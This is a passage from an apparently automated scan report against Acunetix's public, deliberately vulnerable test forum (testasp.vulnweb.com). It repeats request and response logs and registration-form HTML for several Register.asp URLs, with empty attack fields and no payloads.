other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 372 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 3549 |
Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 372 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 3549 |
Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 372 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 3549 |
Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 509 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:03:37 GMT Content-Length: 3635 |
Response Body - size: 3,635 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" 